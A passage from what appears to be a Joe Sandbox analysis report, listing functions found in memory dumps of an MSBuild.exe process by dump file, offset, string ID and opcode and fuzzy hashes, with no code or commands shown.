                          • Opcode ID: 94fcb9c267145a2517402102609ee4536778a26862f0d47d2d5d16398a0064e3
                          • Instruction ID: 6b3314e756cabc6cce14f5da2575898a0d8ade4922ee5e023d31bc0fda8049b5
                          • Opcode Fuzzy Hash: 94fcb9c267145a2517402102609ee4536778a26862f0d47d2d5d16398a0064e3
                          • Instruction Fuzzy Hash: E131BF36A101009FDF088FA4C9A4EAD7BB7FF88310F1540A4EA069B376DA71DC12DB90
                          Function 05ACAA2D Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: LRjq
                          • API String ID: 0-665714880
                          • Opcode ID: 6405a1161124119ed3c9f6dd74d854b315e2a8e7879f43fa7f5232157d16282d
                          • Instruction ID: b430c6a04fbcf99de1cd0b9b5d28fa5da6bf9a5b680c85399d99909f9be21888
                          • Opcode Fuzzy Hash: 6405a1161124119ed3c9f6dd74d854b315e2a8e7879f43fa7f5232157d16282d
                          • Instruction Fuzzy Hash: 6821A032E140356BDF489B68D8509BE73F3AFC4201B1A8955E8027B799CF346D05D7E2
                          Function 05900ADC Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: c8c3f1aaf2d343f4131e33d3960e42ca76bce1c16da726cede9a1e9ad256afa1
                          • Instruction ID: c4d805eb6898639b8ccdb01ad9d567c5e04a8d5048a5f84c1aff5b271f1056e8
                          • Opcode Fuzzy Hash: c8c3f1aaf2d343f4131e33d3960e42ca76bce1c16da726cede9a1e9ad256afa1
                          • Instruction Fuzzy Hash: 00213372A093508FDF165B609C093A97B79BF82304F09189AD885AB2C2D7754846C741
                          Function 05AA35C0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: p<jq
                          • API String ID: 0-3743064563
                          • Opcode ID: b553460dd2c4057025b547b5404f2299d2ce17db9f9dc8cd9f88f7d4433195ac
                          • Instruction ID: f8ca3aa0aa17b7126a3a4745a9e498873ff31d7914c85558524aa1831e7e78ed
                          • Opcode Fuzzy Hash: b553460dd2c4057025b547b5404f2299d2ce17db9f9dc8cd9f88f7d4433195ac
                          • Instruction Fuzzy Hash: 572157723042859FCB05CF2EC940EAA7BEABF8A201B094496FC55CB3A1CB75DC50DB20
                          Function 05ACA9D4 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: LRjq
                          • API String ID: 0-665714880
                          • Opcode ID: 03e0ec2591943376f9bf6b8750721c758d9110594080284bc6d3b0fee2d23523
                          • Instruction ID: 887fa9fc60da79559a7defffb7a13423838c3e7a15b1c655d5df588c3cc4f459
                          • Opcode Fuzzy Hash: 03e0ec2591943376f9bf6b8750721c758d9110594080284bc6d3b0fee2d23523
                          • Instruction Fuzzy Hash: 86217A32E15035ABDF489A69D8108BE73F3BFC420171A8A55E8127B799CB346D05D7E2
                          Function 05AA35B0 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: p<jq
                          • API String ID: 0-3743064563
                          • Opcode ID: d687e322456fdf310fab9987587f88350891d2c9423e75f6bc29e8737aa43589
                          • Instruction ID: c4c2212aac99575dab9da7142ed7c170cc6cd64503a038a595662f940ca35600
                          • Opcode Fuzzy Hash: d687e322456fdf310fab9987587f88350891d2c9423e75f6bc29e8737aa43589
                          • Instruction Fuzzy Hash: 64218B763042459FCB05CF6EC940EAA7BE6BF8A201B1548A6F855CB3A0CB35DC40CB20
                          Function 02AEB617 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tejq
                          • API String ID: 0-2468842661
                          • Opcode ID: c8f870b9d6f5101a44db6d23239a51e45f4b00893d6214659f3859da7d9bfde2
                          • Instruction ID: b157f2944b3361d243d2f1260e8c321a0834ba4867e1c5f60e7a554922eae8d3
                          • Opcode Fuzzy Hash: c8f870b9d6f5101a44db6d23239a51e45f4b00893d6214659f3859da7d9bfde2
                          • Instruction Fuzzy Hash: 16211A70A002898FDF249FA4D4A97AEBFB2FF85304F144529E402AB399DF744946CB94
                          Function 05AC94E0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 9ae710eae01248a83eefa7d429e37d3a1a4565c0d40a8d585a3828fc160a0328
                          • Instruction ID: bb01d900589ee297e4bc4403066e141aa50c0a437df5e7ed06dd0b44d8bd832a
                          • Opcode Fuzzy Hash: 9ae710eae01248a83eefa7d429e37d3a1a4565c0d40a8d585a3828fc160a0328
                          • Instruction Fuzzy Hash: EC115531708A144FD7195B7C6814AAF3FA6AF86610F4801CAE91ACB792CE21EC0683D5
                          Function 05901BAE Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: 3856e8d9b5601566ad17812461446cab3b192cf52cfdf9152753533f50a47c15
                          • Instruction ID: 91b88bb5bf4b38a1f8d8399157289509b6c37624afdea3a85a74bd5bfcfbd31e
                          • Opcode Fuzzy Hash: 3856e8d9b5601566ad17812461446cab3b192cf52cfdf9152753533f50a47c15
                          • Instruction Fuzzy Hash: B611C831B18221CF8B6A17246C544393AABFBC63153042CAADE07CB3C5EF358C42D381
                          Function 02AEB628 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tejq
                          • API String ID: 0-2468842661
                          • Opcode ID: 407b673ff5746f9ec108eca486d1c27a1e0c4d92230a6ac6101999d8489162f4
                          • Instruction ID: 95ff22bcc676cfed3fc12753e8896531fc1e543cea0785befafdbbf8caec0440
                          • Opcode Fuzzy Hash: 407b673ff5746f9ec108eca486d1c27a1e0c4d92230a6ac6101999d8489162f4
                          • Instruction Fuzzy Hash: 5421FCB0A002498FDF249FA5D55C7AEBFB6FF84308F104429E402AB398DF745946DB95
                          Function 05AA0E70 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq
                          • API String ID: 0-1069744364
                          • Opcode ID: 54699b85ebe1eb6ccbfaf7abdf4566eaf6e55e6b683bc020f4c76c99ecd7981f
                          • Instruction ID: 284cf8c8abea79f4db72d77a33c72b1790fb6762617db4f3ca8133b7ab62369c
                          • Opcode Fuzzy Hash: 54699b85ebe1eb6ccbfaf7abdf4566eaf6e55e6b683bc020f4c76c99ecd7981f
                          • Instruction Fuzzy Hash: D5112E75B001058FCB04DF69C95496EBBB5BF85311F158066E905EB365DB70ED01CB91
                          Function 059040FB Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: a0dffffa4d4aee07a336a540c3cb4a3cf5ac4ae37d93fb201585f88c4070b872
                          • Instruction ID: f6631c56bc0112792d279bd18ae5f28e0d2196c3517f6f222459f0cf263d7e95
                          • Opcode Fuzzy Hash: a0dffffa4d4aee07a336a540c3cb4a3cf5ac4ae37d93fb201585f88c4070b872
                          • Instruction Fuzzy Hash: F501F776708301CFDF10594A9941B73BB7EEBE2122F45587BDB0CA7591D66248068691
                          Function 02AE8110 Relevance: .7, Instructions: 714COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d26923a5a28039821f0781f0d19b2f5b24288484ba1c7e51261a1f3804ca3cc
                          • Instruction ID: 72d4ccf2605b296229d96376dc038d30fb18c03d6f632e91edf6c610de0e0ed0
                          • Opcode Fuzzy Hash: 3d26923a5a28039821f0781f0d19b2f5b24288484ba1c7e51261a1f3804ca3cc
                          • Instruction Fuzzy Hash: 3D623A31A0161A8FCB15CF58C5C4AAEF7B2FF48304F258659D856EB225D735EC82CB94
                          Function 05AA5DD0 Relevance: .5, Instructions: 496COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c685b41335ef72c0994bd97c32e3a1821b82768ba6fca872b7bebfd2c1614250
                          • Instruction ID: 8fdce61d86cf897d534197cd3c87d1e17b6cb9f78fb6486217a86f5e2324598d
                          • Opcode Fuzzy Hash: c685b41335ef72c0994bd97c32e3a1821b82768ba6fca872b7bebfd2c1614250
                          • Instruction Fuzzy Hash: A612C235B006058FCB14DF68C984E6A7BF6BF89350B2584A8E916DB375DB31EC41CBA0
                          Function 05AAD730 Relevance: .4, Instructions: 437COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86639122b255cd0ff3f3e9840278db8a79d048a54d8f5a429aba450d649bf1cd
                          • Instruction ID: 6c0455b19b461d713738f2af9b03b4558a4edc75bef0528ba87d331ab6911167
                          • Opcode Fuzzy Hash: 86639122b255cd0ff3f3e9840278db8a79d048a54d8f5a429aba450d649bf1cd
                          • Instruction Fuzzy Hash: 1B120D35B102198FDB14EF64C994AADBBB2BF89300F5085A8D44AAB365DF70ED85CF50
                          Function 059048A8 Relevance: .4, Instructions: 412COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3fc02c8204b5ffadb5350adbb5e4b431d35a4122dae6af745d7c67edc0a9f2d1
                          • Instruction ID: a561ae508bc5fd6f5e9cad7e600704f56043509733fb8972003c0125a61bad6c
                          • Opcode Fuzzy Hash: 3fc02c8204b5ffadb5350adbb5e4b431d35a4122dae6af745d7c67edc0a9f2d1
                          • Instruction Fuzzy Hash: 7CF18230A0121ACFEF14DB54CA50FAEB7BABF44304F5059A9DA09A73D4EB719E44CB91
                          Function 05902290 Relevance: .4, Instructions: 378COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a4fc5042deaaf4bcaf20297b741dd9f66e051e34a8030f385515ae886fcafa6
                          • Instruction ID: 37b1bb1a845f68bc262034eab8a82de4f5a182d3983c534bb4318e65dd45cb09
                          • Opcode Fuzzy Hash: 5a4fc5042deaaf4bcaf20297b741dd9f66e051e34a8030f385515ae886fcafa6
                          • Instruction Fuzzy Hash: 65C146353101064FDB485BAEC8EC66EA6EFAFDA704F50483D6607C62A9DEB58C0687D1
                          Function 05904118 Relevance: .4, Instructions: 358COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 216dd8bd8f89535f7a6afca6bb94685ceba3da088888605359fac017af33d040
                          • Instruction ID: dcd247560cca100203636d1d9438ed30603b09093525e7b6531714e35eb70f79
                          • Opcode Fuzzy Hash: 216dd8bd8f89535f7a6afca6bb94685ceba3da088888605359fac017af33d040
                          • Instruction Fuzzy Hash: A4B1E330704302DBEF146956C698F6BE5EFAFE5606FD04C7E970A872D4EEE45C0086A1
                          Function 02AE3868 Relevance: .3, Instructions: 343COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2f9924da10c0ae93b601970d13980305d12a7f4329846a0b0532d8903d7a59d
                          • Instruction ID: 63cc3b024b2a89208224ca5fbbd766219e2ef175a36f20afce2dbd569da48a96
                          • Opcode Fuzzy Hash: c2f9924da10c0ae93b601970d13980305d12a7f4329846a0b0532d8903d7a59d
                          • Instruction Fuzzy Hash: 0EE14934A00605DFCF14DFA9D984AAEBBF2FF88310F1485A9E91697365DB31AC46CB40
                          Function 058F8177 Relevance: .3, Instructions: 265COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e4b268d547f782a3ed94054aab85f779410fe9522b60290f9379d8d408b0e480
                          • Instruction ID: aa45e40ea21f3c71ef378e58c55d174d88462c762360e33f95042349a021f2a1
                          • Opcode Fuzzy Hash: e4b268d547f782a3ed94054aab85f779410fe9522b60290f9379d8d408b0e480
                          • Instruction Fuzzy Hash: 6791B177929100EFF7119B28F883EA47F32FB5D3247D81145EF41DA212EA34ACA98B54
                          Function 05AC0828 Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b86bea5aa72a055f8ce31ad7adf26d6d39236389b72053a399df8f0f5d2acb2
                          • Instruction ID: 47faa65d7e1a99d5e7df627d7fd69e6a5da1b8e14d5e34804759774fcf1876e1
                          • Opcode Fuzzy Hash: 3b86bea5aa72a055f8ce31ad7adf26d6d39236389b72053a399df8f0f5d2acb2
                          • Instruction Fuzzy Hash: FFA15C357006188FCB05EF68C568D6E7BB2BF89700F108669E5069B3A4DF74ED46CB91
                          Function 02AE3FB0 Relevance: .3, Instructions: 262COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39e422f4abf36d467527277ac51db6769a26f493601c574687d0072a6b07a4c9
                          • Instruction ID: 096efef287de00a742e74f6aab6f9a6ab31c1ed2305ce94f801d4c52a02988b1
                          • Opcode Fuzzy Hash: 39e422f4abf36d467527277ac51db6769a26f493601c574687d0072a6b07a4c9
                          • Instruction Fuzzy Hash: 2EA19D316007408FCB64DF68D5847AABBF2FF88310F5459ADD5468BA92DF34E84ACB51
                          Function 05AC1C30 Relevance: .3, Instructions: 262COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0b6bf02d1d9c796e7567d0f10d23ded1ce4842be1ad15734dd64a13939152e3
                          • Instruction ID: 41434b883b3cb5ca8fc93c38adb32f238ecbbf7181e6bc3e9720793f78e61d7e
                          • Opcode Fuzzy Hash: a0b6bf02d1d9c796e7567d0f10d23ded1ce4842be1ad15734dd64a13939152e3
                          • Instruction Fuzzy Hash: A2A170317046548FDB25DB29C448E7ABFF2BF86310F19869DE49ACB692DB34E841CB50
                          Function 02AE58A8 Relevance: .3, Instructions: 256COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd75751be2387d7e4be4532476fc29f8b4124884fe714f4c0fb423ccddf5ee27
                          • Instruction ID: b67920b236c8e2a86d9fc2c5d0a835adfaad93f36dd636656380bb68f04d555a
                          • Opcode Fuzzy Hash: cd75751be2387d7e4be4532476fc29f8b4124884fe714f4c0fb423ccddf5ee27
                          • Instruction Fuzzy Hash: 5CA18470D002298BCF14CF99D8906ADFBF5FF80318B589A66E456E7256E774DD82CB80
                          Function 02AE626C Relevance: .2, Instructions: 247COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 609e65eaef3e81043647e5c32dcb830bb8737f9ada74d9e7a05f59d385076f87
                          • Instruction ID: e2d4f010b974697644d243792c9cd9ac97bd23e8d4b492d544a18d683b6841ee
                          • Opcode Fuzzy Hash: 609e65eaef3e81043647e5c32dcb830bb8737f9ada74d9e7a05f59d385076f87
                          • Instruction Fuzzy Hash: 99016DB0901B108FD324DF2AD845782BBE1FF88300F04892DC29E87622EB74A80ACB40
                          Function 05AA0208 Relevance: .2, Instructions: 243COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5bf70d7401e1bfe6ee774fa4d64387b413ae534c3037b096aaf28b925ef8f46
                          • Instruction ID: dc1e01485a0fbb920539182f5c9f90b0d3ee300c5435e74d18c21b236ee7d7b9
                          • Opcode Fuzzy Hash: f5bf70d7401e1bfe6ee774fa4d64387b413ae534c3037b096aaf28b925ef8f46
                          • Instruction Fuzzy Hash: 6B918C36B012149FCB15CFA9E598AADBBB2FF88311F148069E912DB390DB71ED45CB50
                          Function 02AE8102 Relevance: .2, Instructions: 240COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42a92b29ee3c943fe8b801c38a709f8c3519a28c7937adc8dcfd77ca3f1dbcf3
                          • Instruction ID: 56035900ba98688f9e02af7af415200cabc520dbd5fa209c20be7dc58adbbafd
                          • Opcode Fuzzy Hash: 42a92b29ee3c943fe8b801c38a709f8c3519a28c7937adc8dcfd77ca3f1dbcf3
                          • Instruction Fuzzy Hash: 9BB12774A00A168FCB15CF68C584AAEF7F2FF48304F68C559D46AA7224D735F892CB90
                          Function 05AAFD00 Relevance: .2, Instructions: 235COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 878fdac20b5b39f7d9e7b1275bef77f8a5e35950cb3c5216020a04a6818207ec
                          • Instruction ID: 94f59d3099a8a62bd8e85b63699071ad5271d0f44d03f9d3131e50eb2260c03a
                          • Opcode Fuzzy Hash: 878fdac20b5b39f7d9e7b1275bef77f8a5e35950cb3c5216020a04a6818207ec
                          • Instruction Fuzzy Hash: 169148357402049FDB08EF68D994E6A77A2EF89710F208569E602CF3B9DB71EC41CB90
                          Function 02AE55D8 Relevance: .2, Instructions: 229COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 973408effed043466c83c70d88a75bd134cf511afaafacae8687caedb7b7965c
                          • Instruction ID: 8457e34d3f9c1c435e1226d361c2053893dc4890a5151abb8ca9b62a67ba960c
                          • Opcode Fuzzy Hash: 973408effed043466c83c70d88a75bd134cf511afaafacae8687caedb7b7965c
                          • Instruction Fuzzy Hash: 26917D31A00B058FDB28EF69D4407ABBBE6FF84314F10892DD19A8B755DB74E906CB90
                          Function 05AAE6C8 Relevance: .2, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 55762596bb8d6691ac340b04eb740d6a391c0fa2e28b3e86078bfc90d9a53a1b
                          • Instruction ID: 8af24274f23a48525eb6466cfb9f6385fe89039d0cc718161f74bc574b09aa04
                          • Opcode Fuzzy Hash: 55762596bb8d6691ac340b04eb740d6a391c0fa2e28b3e86078bfc90d9a53a1b
                          • Instruction Fuzzy Hash: 44812A35B10214DFDB54EF68D498E6EBBB6BF89710F1481A9E5069B3A5CB30EC41CB90
                          Function 05AA5B48 Relevance: .2, Instructions: 208COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a32a814b922f9f71f14074a31d908407fb26afe248b62ce499331d3dde0698de
                          • Instruction ID: a99435252c7333cb5d18df4b5a69ad9825fc5dd8f2a61a09afa3e4a3a9bd5b74
                          • Opcode Fuzzy Hash: a32a814b922f9f71f14074a31d908407fb26afe248b62ce499331d3dde0698de
                          • Instruction Fuzzy Hash: DA81F635A006188FCB14DF68C588D9EBBF6FF88311B1681A9E8169B374DB71ED41CB94
                          Function 05AC0540 Relevance: .2, Instructions: 207COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7bbd4732df7e273fc208893a739a64a5e7b2dc34b37586c32abf69a441b972bb
                          • Instruction ID: 735fec8644e55784039ba5bca145b0b8c5efd04e4d473a567dcfdcb9878db56b
                          • Opcode Fuzzy Hash: 7bbd4732df7e273fc208893a739a64a5e7b2dc34b37586c32abf69a441b972bb
                          • Instruction Fuzzy Hash: C8813C35700619CFCB19EF68C558AADBBB2BF89700F1085ADD4029B3A1DB75DD46CB90
                          Function 02AE0EA0 Relevance: .2, Instructions: 205COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d2c713b580e6facf49d44236063f3e3cb2fd5ad690c1718c51bb08193e9467a
                          • Instruction ID: 1faa2f44cb515f46c24b3777189df0bba5eb3c005a8c3a3a994fec7af715d766
                          • Opcode Fuzzy Hash: 2d2c713b580e6facf49d44236063f3e3cb2fd5ad690c1718c51bb08193e9467a
                          • Instruction Fuzzy Hash: 39914934A01255DFEB24DB68E598BAEBBB3FF84304F104168E506AB391CF749D46CB41
                          Function 02AE1CA8 Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f280126a2f848e867eb11ac3bc37df0b34fd24cc36639bbfb902b9dbe7115779
                          • Instruction ID: 69c5885bc5df6d4f3558cbd063a9c1e0941666bb49923c1132f7c4021b943da4
                          • Opcode Fuzzy Hash: f280126a2f848e867eb11ac3bc37df0b34fd24cc36639bbfb902b9dbe7115779
